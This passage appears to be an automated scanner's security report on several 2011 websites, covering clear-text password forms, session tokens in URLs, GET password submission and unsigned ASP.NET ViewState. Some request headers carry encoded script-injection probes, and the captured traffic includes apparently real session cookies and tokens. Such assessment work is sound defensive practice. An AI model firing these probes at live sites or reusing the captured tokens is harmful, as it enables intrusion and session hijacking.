Set-Cookie: ubid=ShCp%2FqO8Bd%2FNd5qzqksfk3o337c%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT
Set-Cookie: auth=Zaocciefe2iud12Jq25sodTcu2vit7TjegQeSYLGVdilfdfNS7JNv0gado1gfauX2reopc1qxAeqCAoyKTVvomHrTkdZTDb6d12Tjt3FOfo%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT
Set-Cookie: rw=; domain=.43things.com; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _session_id=c7e240c834b15ca5d9602a149dcd92ca; domain=.43things.com; path=/
Content-Length: 13687
Status: 404 Not Found
Cache-Control: max-age=1
Expires: Sun, 09 Jan 2011 01:38:28 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>43 Things</title>
<m
...[SNIP]...
</div>

<form name="existingAccount" action="/auth/login" method="post" onsubmit="new Ajax.Updater('overlay', '/auth/loginjs', {asynchronous:true, evalScripts:true, onLoading:function(request){ajax_status('loadingmsg','<img src=/images/icons/indicator.gif align=middle>', 'replace')}, parameters:Form.serialize(this)}); return false;">

<table class="login-form">
...[SNIP]...
<td align="left" style="background:url('http://acf.43things.com/images/nav/login_input_background.gif') no-repeat left top; width:299px;"><input class="login-input" id="person_password" name="person[password]" size="30" type="password" /></td>
...[SNIP]...

5.16. http://www.facebook.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.facebook.com/

The form contains the following password field:

reg_passwd__

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dcmsinter.net%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.cmsinter.net%252Fblog%252F%26extra_2%3DUS;

Response

5.17. http://www.mlive.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mlive.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.mlive.com/

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: www.mlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM'
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=1
Expires: Sun, 09 Jan 2011 01:44:45 GMT
Date: Sun, 09 Jan 2011 01:44:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><script type="text/javascri
...[SNIP]...
<div class="top">
<form id="ToprailSigninForm" name="ToprailSignInForm" method="post" action="" onsubmit="document.getElementById('login_return_url').value=document.location.href;return true;">
<input type="hidden" name="__mode" value="do_login" />
...[SNIP]...
</label>
<input type="password" id="tr_login_password" name="password" value="" class="field" size="30" />
</div>
...[SNIP]...

5.18. http://www.onestat.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.onestat.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.onestat.com/Default.aspx

The form contains the following password field:

MemberLoginCompact1$Login1$Password

Request

GET / HTTP/1.1
Host: www.onestat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 09 Jan 2011 02:31:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wdsxsqfwe5o3umirakad3355; path=/; HttpOnly
Set-Cookie: UILanguage=en; expires=Sat, 09-Jan-2016 02:31:56 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19494

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
OneStat.com We
...[SNIP]...
<div class="container">
<form name="form1" method="post" action="Default.aspx" id="form1">
<div>
...[SNIP]...
<td><input name="MemberLoginCompact1$Login1$Password" type="password" id="MemberLoginCompact1_Login1_Password" class="login" /></td>
...[SNIP]...

5.19. http://www.peanutlabs.com/adminLogin.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/adminLogin.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.peanutlabs.com/?cmd=admin_login

The form contains the following password field:

varPassword

Request

GET /adminLogin.php HTTP/1.1
Host: www.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sex=deleted; pl_email=test4%40fastdial.net; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_lang=en_US; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; ext_cid=deleted; dob=deleted; PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; pl_profile=deleted; __utmc=184043431; __utmb=184043431.2.10.1294536629;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:06:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Length: 2615
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<div class="topLarge">
           <form name="" method="POST"     action="?cmd=admin_login">

                   <div class="">
...[SNIP]...
<td><input class="border inputField200" name="varPassword" type="password"></td>
...[SNIP]...

5.20. http://www.pogo.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.pogo.com/action/pogo/lightreg/module.do?pageSection=Home-reg-module-3

The form contains the following password fields:

password
password_confirm

Request

Response

5.21. http://www.pogo.com/account/verify-password.do previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/account/verify-password.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.pogo.com/account/verify-password.do

The form contains the following password field:

password

Request

GET /account/verify-password.do HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536393024-New%7C1297128393024%3B

Response

5.22. http://www.pogo.com/action/pogo/lightregview.do previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/action/pogo/lightregview.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.pogo.com/action/pogo/lightreg.do

The form contains the following password fields:

password
password_confirm

Request

GET /action/pogo/lightregview.do HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/?sl=2&f9258%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4225969d669=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536332622-New%7C1297128332622%3B

Response

5.23. http://www.rockband.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rockband.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.rockband.com/

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: www.rockband.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-MyHeader: (null)
X-Duration: D=677765 microseconds
Content-Type: text/html; charset=utf-8
Expires: Sun, 09 Jan 2011 02:53:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 09 Jan 2011 02:53:52 GMT
Content-Length: 19192
Connection: close
Set-Cookie: rb_s=3a49e7e697e2c5f07de70a8b370be1bb; path=/

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
   <head>
       <meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...
<div id="sign_in_form_container" style="display: none;">
   <form>
       username: <input type="text" name="username" id="username" />
       password: <input type="password" name="password" id="password" />
       remember me: <input type="checkbox" name="remember" id="remember" value="true" />
...[SNIP]...

5.24. http://www.xanga.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.xanga.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.xanga.com/default.aspx

The form contains the following password field:

XangaHeader$txtSigninPassword

Request

GET / HTTP/1.1
Host: www.xanga.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: fp-promo-count=1:634325354543847909; expires=Sun, 06-Feb-2011 01:44:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 09 Jan 2011 01:44:13 GMT
Connection: close
Content-Length: 82140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<div class="modulecontent">

<form id="SigninForm" class="Form1" method="post" action="http://www.xanga.com/default.aspx">
<input name="IsPostBack" type="hidden" id="IsPostBack" />
...[SNIP]...
<div class="itembody">
<input name="XangaHeader$txtSigninPassword" type="password" id="XangaHeader_txtSigninPassword" maxlength="16" onkeypress="return SigninOnEnter(event);" onmouseover="this.className='over';" onmouseout="this.className='';" onfocus="this.className='over';" onblur="this.className='';" tabindex="2" />
<a id="signin" href="javascript: SigninSubmit();" tabindex="3">
...[SNIP]...

6. Session token in URL previous next
There are 3 instances of this issue:

http://www.facebook.com/extern/login_status.php
http://www.pogo.com/account/my-account/main.do
http://www.slidedeck.com/

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

6.1. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.facebook.com/extern/login_status.php?api_key=8e6a1a98056aa9ca18b3ce59e4ec2fb4&app_id=8e6a1a98056aa9ca18b3ce59e4ec2fb4&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df3b015eec4%26origin%3Dhttp%253A%252F%252Fwww.pogo.com%252Ff3c647ad18%26relation%3Dopener%26transport%3Dpostmessage%26frame%3Df3625f2e24%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df138cd7e08%26origin%3Dhttp%253A%252F%252Fwww.pogo.com%252Ff3c647ad18%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3625f2e24&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Dff465dc08%26origin%3Dhttp%253A%252F%252Fwww.pogo.com%252Ff3c647ad18%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3625f2e24&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df12d7b018c%26origin%3Dhttp%253A%252F%252Fwww.pogo.com%252Ff3c647ad18%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3625f2e24&sdk=joey&session_version=3

Request

GET /extern/login_status.php?api_key=8e6a1a98056aa9ca18b3ce59e4ec2fb4&app_id=8e6a1a98056aa9ca18b3ce59e4ec2fb4&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df3b015eec4%26origin%3Dhttp%253A%252F%252Fwww.pogo.com%252Ff3c647ad18%26relation%3Dopener%26transport%3Dpostmessage%26frame%3Df3625f2e24%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df138cd7e08%26origin%3Dhttp%253A%252F%252Fwww.pogo.com%252Ff3c647ad18%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3625f2e24&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Dff465dc08%26origin%3Dhttp%253A%252F%252Fwww.pogo.com%252Ff3c647ad18%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3625f2e24&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df12d7b018c%26origin%3Dhttp%253A%252F%252Fwww.pogo.com%252Ff3c647ad18%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3625f2e24&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%253Fext_reg%253D1%26extra_2%3DUS; wd=200x40

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php#cb=ff465dc08&origin=http%3A%2F%2Fwww.pogo.com%2Ff3c647ad18&relation=parent&transport=postmessage&frame=f3625f2e24
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Sun, 09 Jan 2011 01:25:12 GMT
Content-Length: 0

6.2. http://www.pogo.com/account/my-account/main.do previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.pogo.com
Path:	/account/my-account/main.do

Issue detail

The response contains the following links that appear to contain session tokens:

https://checkout.pogo.com/lockbox-ui/manageaccounts/showAccounts?encryptedToken=9xvOPkA-igVLGPFxOWBmhVS3npbWe2NXkZsueF0qw-Hmkc6sATMqxK_iiAb8qiQcVXnMfyp2i5vKQuBLnyoDUGpX5GCBuMK_3Ov29oVhDQQI2ipFS_IydUVPngZ8z047lJreOxhzZkwyUxn6p_7GmLcPKtz2XKHIZaqxvshiHYxqe9rCMPOvze6BCBRPJXVJ4fguurJaEEAQWFE9kRnxKwSEP78v0mNKJXGzoZHwSFtbgDBBDiVGpMOpqAYvJgRFO78YstISGxddQeNIH9V_6tuGbor2tg_jGpw0JWIhen0.&lang=en_US&returnUrl=http%3A%2F%2Fwww.pogo.com%2Fmisc%2Freturn.do%3FreturnType%3DmyAccount

Request

GET /account/my-account/main.do HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/account/my-account/edit-checkout-settings.do
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536492836-New%7C1297128492836%3B

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
text/html: encoding=UTF-8
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 01:28:07 GMT
Server: Apache-Coyote/1.1
Content-Length: 24064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
</div>


                                                               <a href="https://checkout.pogo.com/lockbox-ui/manageaccounts/showAccounts?encryptedToken=9xvOPkA-igVLGPFxOWBmhVS3npbWe2NXkZsueF0qw-Hmkc6sATMqxK_iiAb8qiQcVXnMfyp2i5vKQuBLnyoDUGpX5GCBuMK_3Ov29oVhDQQI2ipFS_IydUVPngZ8z047lJreOxhzZkwyUxn6p_7GmLcPKtz2XKHIZaqxvshiHYxqe9rCMPOvze6BCBRPJXVJ4fguurJaEEAQWFE9kRnxKwSEP78v0mNKJXGzoZHwSFtbgDBBDiVGpMOpqAYvJgRFO78YstISGxddQeNIH9V_6tuGbor2tg_jGpw0JWIhen0.&lang=en_US&returnUrl=http%3A%2F%2Fwww.pogo.com%2Fmisc%2Freturn.do%3FreturnType%3DmyAccount" id="edit-settings">Edit Pogo Gems™ Payment Info</a>
...[SNIP]...

6.3. http://www.slidedeck.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.slidedeck.com
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.slidedeck.com/wp-admin/admin-ajax.php?action=usdd_show&url=http%3A%2F%2Ffeeds.feedburner.com%2FTechCrunch&skin=light&navigation=simple-dots&_wpnonce=695cf3a777
http://www.slidedeck.com/wp-admin/admin-ajax.php?action=usdd_show&url=http%3A%2F%2Frss1.smashingmagazine.com%2Ffeed%2F&_wpnonce=695cf3a777
http://www.slidedeck.com/wp-admin/admin-ajax.php?action=usdd_show&url=http%3A%2F%2Frss1.smashingmagazine.com%2Ffeed%2F&skin=light&navigation=simple-dots&_wpnonce=695cf3a777
http://www.slidedeck.com/wp-admin/admin-ajax.php?action=usdd_show&url=http%3A%2F%2Fwww.dtelepathy.com%2Fblog%2Ffeed&skin=dark&navigation=simple-dots&_wpnonce=695cf3a777
http://www.slidedeck.com/wp-admin/admin-ajax.php?action=usdd_show&url=http%3A%2F%2Fwww.dtelepathy.com%2Fblog%2Ffeed&skin=light&navigation=dates&_wpnonce=695cf3a777
http://www.slidedeck.com/wp-admin/admin-ajax.php?action=usdd_show&url=http%3A%2F%2Fwww.dtelepathy.com%2Fblog%2Ffeed&skin=light&navigation=post-titles&_wpnonce=695cf3a777
http://www.slidedeck.com/wp-admin/admin-ajax.php?action=usdd_show&url=http%3A%2F%2Fwww.dtelepathy.com%2Fblog%2Ffeed&skin=light&navigation=simple-dots&_wpnonce=695cf3a777
http://www.slidedeck.com/wp-admin/admin-ajax.php?action=usdd_show&url=http%3A%2F%2Fwww.engadget.com%2Frss.xml&skin=light&navigation=simple-dots&_wpnonce=695cf3a777

Request

GET / HTTP/1.1
Host: www.slidedeck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:08:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Sun, 02 Jan 2011 03:07:02 GMT
Last-Modified: Sun, 09 Jan 2011 03:08:03 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.slidedeck.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta charset="
...[SNIP]...
<p><a href="http://www.slidedeck.com/wp-admin/admin-ajax.php?action=usdd_show&url=http%3A%2F%2Frss1.smashingmagazine.com%2Ffeed%2F&_wpnonce=695cf3a777" class="button ultimate-slidedeck-demo" onclick="return false;">Try The Demo</a>
...[SNIP]...
</h5>
<a href="http://www.slidedeck.com/wp-admin/admin-ajax.php?action=usdd_show&url=http%3A%2F%2Frss1.smashingmagazine.com%2Ffeed%2F&skin=light&navigation=simple-dots&_wpnonce=695cf3a777" class="button smashing-magazine">Smashing Magazine</a>
<a href="http://www.slidedeck.com/wp-admin/admin-ajax.php?action=usdd_show&url=http%3A%2F%2Fwww.engadget.com%2Frss.xml&skin=light&navigation=simple-dots&_wpnonce=695cf3a777" class="button engadget">Engadget</a>
<a href="http://www.slidedeck.com/wp-admin/admin-ajax.php?action=usdd_show&url=http%3A%2F%2Ffeeds.feedburner.com%2FTechCrunch&skin=light&navigation=simple-dots&_wpnonce=695cf3a777" class="button techcrunch">TechCrunch</a>
...[SNIP]...
</h5>
<a href="http://www.slidedeck.com/wp-admin/admin-ajax.php?action=usdd_show&url=http%3A%2F%2Fwww.dtelepathy.com%2Fblog%2Ffeed&skin=light&navigation=simple-dots&_wpnonce=695cf3a777" class="button skin light">
<img src="http://www.slidedeck.com/wp-content/plugins/ultimate-slidedeck-demo/images/thumb_light.png" alt="" />
...[SNIP]...
</a>
<a href="http://www.slidedeck.com/wp-admin/admin-ajax.php?action=usdd_show&url=http%3A%2F%2Fwww.dtelepathy.com%2Fblog%2Ffeed&skin=dark&navigation=simple-dots&_wpnonce=695cf3a777" class="button skin dark">
<img src="http://www.slidedeck.com/wp-content/plugins/ultimate-slidedeck-demo/images/thumb_dark.png" alt="" />
...[SNIP]...
</h5>
<a href="http://www.slidedeck.com/wp-admin/admin-ajax.php?action=usdd_show&url=http%3A%2F%2Fwww.dtelepathy.com%2Fblog%2Ffeed&skin=light&navigation=simple-dots&_wpnonce=695cf3a777" class="button navigation simple-dots">
<img src="http://www.slidedeck.com/wp-content/plugins/ultimate-slidedeck-demo/images/thumb_simple-dots.png" alt="" />
...[SNIP]...
</a>
<a href="http://www.slidedeck.com/wp-admin/admin-ajax.php?action=usdd_show&url=http%3A%2F%2Fwww.dtelepathy.com%2Fblog%2Ffeed&skin=light&navigation=dates&_wpnonce=695cf3a777" class="button navigation dates">
<img src="http://www.slidedeck.com/wp-content/plugins/ultimate-slidedeck-demo/images/thumb_dates.png" alt="" />
...[SNIP]...
</a>
<a href="http://www.slidedeck.com/wp-admin/admin-ajax.php?action=usdd_show&url=http%3A%2F%2Fwww.dtelepathy.com%2Fblog%2Ffeed&skin=light&navigation=post-titles&_wpnonce=695cf3a777" class="button navigation post-titles">
<img src="http://www.slidedeck.com/wp-content/plugins/ultimate-slidedeck-demo/images/thumb_post-titles.png" alt="" />
...[SNIP]...

7. Password field submitted using GET method previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.rockband.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.rockband.com/

The form contains the following password field:

password

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET / HTTP/1.1
Host: www.rockband.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8. ASP.NET ViewState without MAC enabled previous next
There are 2 instances of this issue:

http://beta-ads.ace.advertising.com/
http://r1.ace.advertising.com/

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.

8.1. http://beta-ads.ace.advertising.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://beta-ads.ace.advertising.com
Path:	/

Request

GET / HTTP/1.1
Host: beta-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sun, 09 Jan 2011 02:03:43 GMT
Content-Length: 1402
Connection: close
Set-Cookie: A07L=CT; expires=Sun, 06-Feb-2011 02:03:43 GMT; path=/; domain=beta-ads.ace.advertising.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ad
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODQwMjU1MDE5ZGQ=" />
...[SNIP]...

8.2. http://r1.ace.advertising.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://r1.ace.advertising.com
Path:	/

Request

GET / HTTP/1.1
Host: r1.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
